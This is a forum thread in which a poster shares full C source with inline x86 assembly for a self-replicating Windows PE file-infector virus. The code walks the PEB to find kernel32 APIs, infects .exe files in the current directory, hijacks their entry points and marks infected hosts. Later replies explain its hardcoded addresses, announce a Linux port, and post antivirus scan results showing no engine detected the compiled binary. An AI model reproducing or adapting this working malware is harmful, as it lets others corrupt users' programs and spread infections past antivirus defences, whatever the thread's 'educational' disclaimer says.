JMC31337 Posted April 21, 2019 Share Posted April 21, 2019 //./gcc -masm=intel -mwindows -m32 -o file.exe xfile.c //Run the virus under a debugger (the jmp orig EP only works //after first infection is completed - afterwards all files //will infect and run as normal //it will infect 1 exe file per run in current dir //x86 PE Parasite //WARNING! //For educational purposes and virology analysis ONLY! //The author is not responsible for any damage caused //by this code //NOTE: I took some cheap tactics and tricks to get this //to work and its some real convoluted coding //============virt mem array========= //virtallocAPI* [ebp+0x00] (win7) //findfirstfileAPI [ebp+0x04] //findnextfileAPI [ebp+0x08] //CreateFileAPI [ebp+0x0c] //ReadFileAPI [ebp+0x10] //CloseHandleAPI [ebp+0x14] //WriteFileAPI [ebp+0x18] //fileEP [ebp+0x1c] PE+0x28 //fileSecNos [ebp+0x20] PE+0x06 //fileImgSize+4000h [ebp+0x24] PE+0x50 //fileImgBase [ebp+0x28] PE+34 //fileSecVS+4000h [ebp+0x2c] PE+F8+((0x28*[secnos])-20h) //fileSecRS+4000h [ebp+0x30] PE+F8+((0x28*[secnos])-18h) //shellEP [ebp+0x34] //hostloadPTR [ebp+0x38] //GetProcAPI [ebp+0x3c] //LoadLib [ebp+0x40] //k32 base [ebp+0x44] //fhandle [ebp+0x48] //WIN32_FILE_DATA [ebp+0x4C] //WIN32 fname [ebp+WIN32_FILE_DATA+0x2c] //GetFileSizeAPI [ebp+0x100] //FileSize [ebp+0x104] //virtHostAddr [ebp+0x108] //========================================= #include <windows.h> void step() { asm ( ".intel_syntax noprefix\n" //HEURISTICS AV DETECT THIS //BASE WALKING //crypto mem it "_start:\n" "call _start2\n" "_start2:\n" "pop ebx\n" "sub ebx,0x05\n" "pushad\n" "mov [0x7EFDF400],ebx\n" //CHEAP //================================== "mov eax,dword ptr fs:[0x30]\n" "mov eax,dword ptr ds:[eax+0xC]\n" "mov eax,dword ptr ds:[eax+0x14]\n" "mov eax,dword ptr ds:[eax]\n" "mov eax,dword ptr ds:[eax]\n" "mov eax,dword ptr ds:[eax+0x10]\n" //=================================== "mov ebx,eax\n" //eax ebx = k32 base "mov eax,[eax+0x3c]\n" "add eax,ebx\n" //eax=PE "cmp word 
ptr[eax+0x04],0x014C\n" //0x8664 for x64...0x14c for x86 "jne _end\n" "sub eax,ebx\n" "mov eax,[eax+0x78+ebx]\n" "add eax,ebx\n" "mov edx,eax\n" //edx=imgVA "mov ecx,[edx+0x18]\n" "mov eax,[edx+0x20]\n" "add eax,ebx\n" "_find:\n" "dec ecx\n" "mov edi,[eax+ecx*0x04]\n" "add edi,ebx\n" "cmp dword ptr [edi],0x50746547\n" "jnz _find\n" "cmp dword ptr [edi + 0x04],0x41636f72\n" //Acor "jnz _find\n" "cmp dword ptr [edi + 0x08],0x65726464\n" //erdd "jnz _find\n" "cmp word ptr [edi + 0x0C],0x7373\n" //ss "jnz _find\n" "mov eax,[edx+0x24]\n" "add eax,ebx\n" "mov cx,[eax+ecx*0x02]\n" "mov eax,[edx+0x1c]\n" "add eax,ebx\n" "mov eax,[eax+ecx*0x04]\n" "add eax,ebx\n" "mov edi,eax\n" //edi eax = GetProcAPI "push 0x00\n" //00000000 .... "push 0x41797261\n" //41797261 aryA "push 0x7262694C\n" //7262694C Libr "push 0x64616F4C\n" //64616F4C Load "push esp\n" //esp = loadlibraryA on stack "push ebx\n" //push the k32 base address "call edi\n" "add esp,0x10\n" //clean stack garbage up "mov edx,eax\n" //edx=LoadLibraryA API edi=GetProcAddr "push edx\n" //set virt mem location RWE "push 0x00\n" "push 0x636f6c6c\n" "push 0x416c6175\n" "push 0x74726956\n" "push esp\n" "push ebx\n" "call edi\n" //eax=VirtualAllocAPI "add esp,0x10\n" //clean stack garbage up "push 0x40\n" "push 0x1000\n" "push 0x1000\n" "push 0\n" "call eax\n" //eax=Virtrual RWE mem array "mov ebp,eax\n" //set the ebp pointer to virt mem "mov ecx,edi\n" "add ecx,0x600\n" //win7 virt alloc is -600 getproc "mov [ebp],ecx\n" "mov [ebp+0x3c],edi\n" "mov [ebp+0x44],ebx\n" "pop edx\n" "mov [ebp+0x40],edx\n" //edi=getproc //FindFirstFileA //46 69 6E 64 46 69 72 73 74 46 69 6C 65 41 00 "push 0x004165\n" "push 0x6c694674\n" "push 0x73726946\n" "push 0x646e6946\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x04],eax\n" "add esp,0x10\n" //FindNextFileA //46 69 6E 64 4E 65 78 74 46 69 6C 65 41 00 "push 0x0041\n" "push 0x656c6946\n" "push 0x7478654e\n" "push 0x646e6946\n" "push esp\n" "push ebx\n" "call edi\n" "mov 
[ebp+0x08],eax\n" "add esp,0x10\n" //CreateFileA //43 72 65 61 74 65 46 69 6C 65 41 00 "push 0x0041656c\n" "push 0x69466574\n" "push 0x61657243\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x0c],eax\n" "add esp,0x0c\n" //ReadFile //52 65 61 64 46 69 6C 65 00 "push 0x00\n" "push 0x656c6946\n" "push 0x64616552\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x10],eax\n" "add esp,0x0c\n" //CloseHandle //43 6C 6F 73 65 48 61 6E 64 6C 65 00 "push 0x00656c64\n" "push 0x6e614865\n" "push 0x736f6c43\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x14],eax\n" "add esp,0x0c\n" //WriteFile //57 72 69 74 65 46 69 6C 65 00 "push 0x0065\n" "push 0x6c694665\n" "push 0x74697257\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x18],eax\n" "add esp,0x0c\n" //GetFileSize //47 65 74 46 69 6C 65 53 69 7A 65 "push 0x00657a69\n" "push 0x53656c69\n" "push 0x46746547\n" "push esp\n" "push ebx\n" "call edi\n" "mov edx,ebp\n" "add edx,0x100\n" "mov [edx],eax\n" "add esp,0x0c\n" //setup WIN32_FIND_DATA "mov edx,ebp\n" "add edx,0x2c\n" "add edx,0x4c\n" "mov dword ptr[edx],0x78652e2a\n" "mov dword ptr[edx+0x4],0x0065\n" "mov edx,ebp\n" "add edx,0x4c\n" "push edx\n" "mov edx,ebp\n" "add edx,0x78\n" "push edx\n" "mov edx,[ebp+0x04]\n" "call edx\n" //FindFirstFile "cmp eax,0x00\n" //eax 0 = no file "je _end\n" "mov [ebp+0x48],eax\n" //open file to see if it has RW privs "push 0x00\n" "push 0x80\n" "push 0x03\n" "push 0x00\n" "push 0x00\n" "push 0xC0000000\n" //read+write "mov edx,ebp\n" "add edx,0x78\n" "push edx\n" "mov edx,[ebp+0x0c]\n" "call edx\n" //CreateFile "cmp eax,0x00\n" "je _end\n" "cmp eax,0xFFFFFFFF\n" //ff...=share error "je _findnext\n" "mov [ebp+0x250],eax\n" "_findret:\n" //GetFileSize //eax=file handle "push eax\n" "mov edx,ebp\n" "add edx,0x104\n" "push edx\n" "sub edx,0x04\n" "push eax\n" "mov edx,[edx]\n" "call edx\n" "mov [ebp+0x104],eax\n" "mov edx,eax\n" "add edx,0x4000\n" //inc fsize + 4000h "push 0x40\n" //PAGE_EXECUTE_READWRITE "push 0x1000\n" 
//MEM_COMMIT "push edx\n" //size "push 0x00\n" //virt addr "mov edx,[ebp]\n" "call edx\n" "mov [ebp+0x108],eax\n" //ReadFile "mov edx,0x00\n" "push edx\n" "mov edx,ebp\n" "add edx,0x10c\n" //ebp+10c hold the bytes read ret "push edx\n" "mov edx,ebp\n" "add edx,0x104\n" "mov edx,[edx]\n" //"add edx,0x4000\n" "push edx\n" "mov edx,ebp\n" "add edx,0x108\n" "mov edx,[edx]\n" "push edx\n" "mov edx,[esp+0x10]\n" "push edx\n" "mov edx,[ebp+0x10]\n" "call edx\n" //ReadFile (ebp+0x108 = virt file) "add esp,0x04\n" //CloseHandle "mov edx,[ebp+0x250]\n" "push edx\n" "mov edx,[ebp+0x14]\n" "call edx\n" //DETECT EOF "X" IF HOST IS INFECTED //CLOSEHANDLE B4 findnext?? "mov edx,[ebp+0x108]\n" "add edx,[ebp+0x104]\n" "dec edx\n" "cmp byte ptr [edx],0x58\n" "je _findnext\n" "mov edx,[ebp+0x108]\n" "add edx,[edx+0x3c]\n" "cmp word ptr [edx+0x04],0x014c\n" //x86 parasite "jne _findnext\n" //***************************************8 //place host's EP into 0x7EFDF404 // and host's PE+ 0xbc //since we'll overwrite orig EP //to point to shell "push edx\n" "mov ecx,edx\n" "add ecx,0xbc\n" //"mov ecx,[edx+0xbc]\n" //host PE not used location "mov eax,[edx+0x34]\n" //eax=hostBaseAddr "add edx,0x28\n" "mov edx,[edx]\n" "add edx,eax\n" "mov [ecx],edx\n" "mov [0x7efdf404],edx\n" "pop edx\n" //****************************************8 "mov ecx,[edx+0x28]\n" //here--------------------------------------------------- "mov ecx,[0x7EFDF404]\n" "mov [edx+0xbc],ecx\n" "mov [ebp+0x200],ecx\n" //------------------------------------------------------- "mov [ebp+0x1c],ecx\n" "xor ecx,ecx\n" "mov cx,word ptr[edx+0x06]\n" "mov [ebp+0x20],ecx\n" "mov ecx,[edx+0x50]\n" "mov [ebp+0x24],ecx\n" "mov ecx,[edx+0x34]\n" "mov [ebp+0x28],ecx\n" "mov ecx,edx\n" "add ecx,0xf8\n" "mov eax,[ebp+0x20]\n" "mov edx,0x28\n" "mul edx\n" "add ecx,eax\n" "sub ecx,0x20\n" "mov edx,[ecx]\n" "mov [ebp+0x2c],edx\n" "add ecx,0x08\n" "mov edx,[ecx]\n" "mov [ebp+0x30],edx\n" //edx=PE sec vs "mov edx,[ebp+0x2c]\n" "add edx,0x4000\n" 
"mov [ebp+0x2c],edx\n" "mov edx,[ebp+0x30]\n" "add edx,0x4000\n" "mov [ebp+0x30],edx\n" "mov edx,[ebp+0x24]\n" "add edx,0x4000\n" "mov [ebp+0x24],edx\n" "push 0x006c6c\n" "push 0x642e3233\n" "push 0x72657375\n" "mov edx,[ebp+0x40]\n" "push esp\n" "call edx\n" "add esp,0x0c\n" "push 0x0041786f\n" "push 0x42656761\n" "push 0x7373654d\n" "push esp\n" "push eax\n" "mov edx,[ebp+0x3c]\n" "call edx\n" "add esp,0x08\n" "push 0x00\n" "push 0x00\n" "push 0x00\n" "push 0x00\n" "call eax\n" "add esp,0x04\n" //DETECT virus -> host //DETECT infectedHOST -> host "_peNFX:\n" "mov edx,[ebp+0x108]\n" "add edx,[ebp+0x104]\n" "mov ecx,0x550\n" "mov esi,[0x7EFDF400]\n" //"add esi,[ebp+0x108]\n" "mov edi,edx\n" "rep movsb\n" "mov ecx,[ebp+0x108]\n" "add ecx,[ecx+0x3c]\n" "add ecx,0xf8\n" "mov eax,[ebp+0x20]\n" "mov edx,0x28\n" "mul edx\n" "add ecx,eax\n" "sub ecx,0x20\n" "push ecx\n" "mov edx,ebp\n" "add edx,0x28\n" "mov edx,[edx]\n" "add edx,[ebp+0x1c]\n" "mov ecx,[ebp+0x104]\n" "add ecx,0x4000\n" //================================== //notes: //*change hostEP "mov edx,[esp]\n" "mov eax,[edx+0x0c]\n" //eax=RO "sub ecx,eax\n" "mov eax,[edx+0x04]\n" //edx=VO "add ecx,eax\n" "mov [ebp+0x34],ecx\n" "mov edx,ebp\n" "add edx,0x108\n" "mov edx,[edx]\n" //change VS "mov edx,[esp]\n" "mov eax,[ebp+0x2c]\n" "mov [edx],eax\n" //change RS "mov edx,[esp]\n" "add edx,0x08\n" "mov eax,[ebp+0x30]\n" "mov [edx],eax\n" //change imgsize "mov edx,[esp]\n" "mov edx,[ebp+0x108]\n" "add edx,[edx+0x3c]\n" "add edx,0x50\n" "mov eax,[ebp+0x24]\n" "mov [edx],eax\n" //add "X" EOF indication "mov edx,[ebp+0x108]\n" "add edx,[ebp+0x104]\n" "add edx,0x4000\n" "dec edx\n" "mov byte ptr[edx],0x58\n" //reopen file for write //when using valloc //we cant access a file //for read then write one shot //its one then the other "push 0x00\n" "push 0x80\n" "push 0x03\n" "push 0x00\n" "push 0x00\n" "push 0x40000000\n" //read+write "mov edx,ebp\n" "add edx,0x78\n" "push edx\n" "mov edx,[ebp+0x0c]\n" "call edx\n" //CreateFile 
"cmp eax,0x00\n" "je _end\n" "cmp eax,0xFFFFFFFF\n" //ff...=share error "je _findnext\n" "mov [ebp+0x250],eax\n" //shell_raw_location - ro + vo + imgbase //change hostEP "mov eax,[ebp+0x108]\n" "add eax,[ebp+0x104]\n" "add eax,0x502\n" //CHEAP "mov edx,fs:[0x30]\n" "mov edx,[edx+0x08]\n" "push edx\n" //"mov edx,[0x010075]\n" //CHEAP "add edx,[edx+0x3c]\n" "add edx,0x28\n" "mov edx,[edx]\n" "pop ecx\n" "add edx,ecx\n" //"mov [eax],edx\n" "mov [0x7EFDF400],edx\n" "mov edx,[ebp+0x108]\n" "add edx,[edx+0x3c]\n" "add edx,0x28\n" "mov ecx,[ebp+0x104]\n" //"sub ecx,0x4000\n" "mov edx,[esp]\n" "sub ecx,[edx+0x0c]\n" "add ecx,[edx+0x04]\n" "mov edx,[ebp+0x108]\n" "add edx,[edx+0x3c]\n" "add edx,0x28\n" "mov [edx],ecx\n" /* "mov ecx,[ebp+0x108]\n" "add ecx,[ecx+0x3c]\n" "mov edx,[0x7EFDF404]\n" "add ecx,0xbc\n" "mov [ecx],edx\n" */ //writefile "push 0x00\n" "mov edx,ebp\n" "add edx,0x10c\n" "mov dword ptr[edx],0x000000\n" "push edx\n" "mov edx,[ebp+0x104]\n" "add edx,0x4000\n" "push edx\n" "mov edx,[ebp+0x108]\n" "push edx\n" "mov edx,[ebp+0x250]\n" "push edx\n" "mov edx,[ebp+0x18]\n" "call edx\n" "pop eax\n" "jmp _end\n" "_findnext:\n" "mov edx,ebp\n" "add edx,0x4c\n" "push edx\n" "mov edx,[ebp+0x48]\n" "push edx\n" "mov edx,[ebp+0x08]\n" "call edx\n" "cmp eax,0x00\n" "je _end\n" "push 0x00\n" "push 0x80\n" "push 0x03\n" "push 0x00\n" "push 0x00\n" "push 0xc0000000\n" //read+write "mov edx,ebp\n" "add edx,0x78\n" "push edx\n" "mov edx,[ebp+0x0c]\n" "call edx\n" //CreateFileA "cmp eax,0x00\n" "je _end\n" "cmp eax,0xFFFFFFFF\n" //ff...=share error "je _findnext\n" "mov [ebp+0x250],eax\n" "jmp _findret\n" //detect eax=0 and eax=ffffffff "_end:\n" "popad\n" "mov edx,fs:[0x30]\n" "mov edx,[edx+0x08]\n" "mov ecx,edx\n" "add ecx,[ecx+0x3c]\n" "mov edx,[ecx+0xbc]\n" "jmp edx\n" "push eax\n" "push eax\n" ); }//end step fx int WINAPI WinMain(HINSTANCE h, HINSTANCE h2, LPSTR lp, int i) { asm("pop ebp\n"); asm("call _start\n"); MessageBoxA(0,0,0,0); } Link to comment Share on other 
CodeExplorer Posted April 21, 2019 Share Posted April 21, 2019 Look a bit like my private virus! Quote "mov [0x7EFDF400],ebx\n" //CHEAP Quote "mov [0x7EFDF400],edx\n" What are those for? Plus I doubt it will work on any OS different than yours! Link to comment Share on other sites More sharing options...
JMC31337 Posted April 21, 2019 Author Share Posted April 21, 2019 2 hours ago, CodeExplorer said: Look a bit like my private virus! What are those for? Plus I doubt it will work on any OS different than yours! That’s just a location in the PEB that can handle some stored dword data tested on a win7, the virtualalloc method (add ecx,600) may not work on others but it can be fixed to do so take care, on to Linux to write one similar Link to comment Share on other sites More sharing options...
JMC31337 Posted May 5, 2019 Author Share Posted May 5, 2019 xfile.exe Name: xfile.exe Size: 18.33kB (18,768 bytes) Type: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows First seen: May 5, 2019 at 11:03:22 PM GMT+2 MD5: 3b722544eb9410e2f7bf42350ff530c0 SHA1: 1e1edf4df43fafe5a3cfa18646a573142545ad6e Status: Scan finished. 0/15 scanners reported malware. Scan taken on: May 5, 2019 at 11:03:23 PM GMT+2 Avast! Antivirus May 5, 2019 Found nothing BitDefender Antivirus May 5, 2019 Found nothing ClamAV May 5, 2019 Found nothing Dr. Web May 5, 2019 Found nothing MicroWorld eScan May 5, 2019 Found nothing ESET May 5, 2019 Found nothing Fortinet May 4, 2019 Found nothing F-PROT Antivirus May 5, 2019 Found nothing F-Secure Anti-Virus May 5, 2019 Found nothing G DATA May 5, 2019 Found nothing Ikarus May 5, 2019 Found nothing K7 AV May 5, 2019 Found nothing Sophos May 5, 2019 Found nothing Trend Micro Antivirus May 4, 2019 Found nothing VBA32 May 4, 2019 Found nothing --Jotti Scanned -- Norton Internet Security: heuristics were raised, but only AFTER the infection had already spread to 1 file; that 1 file was not able to infect any other file. Link to comment Share on other sites More sharing options...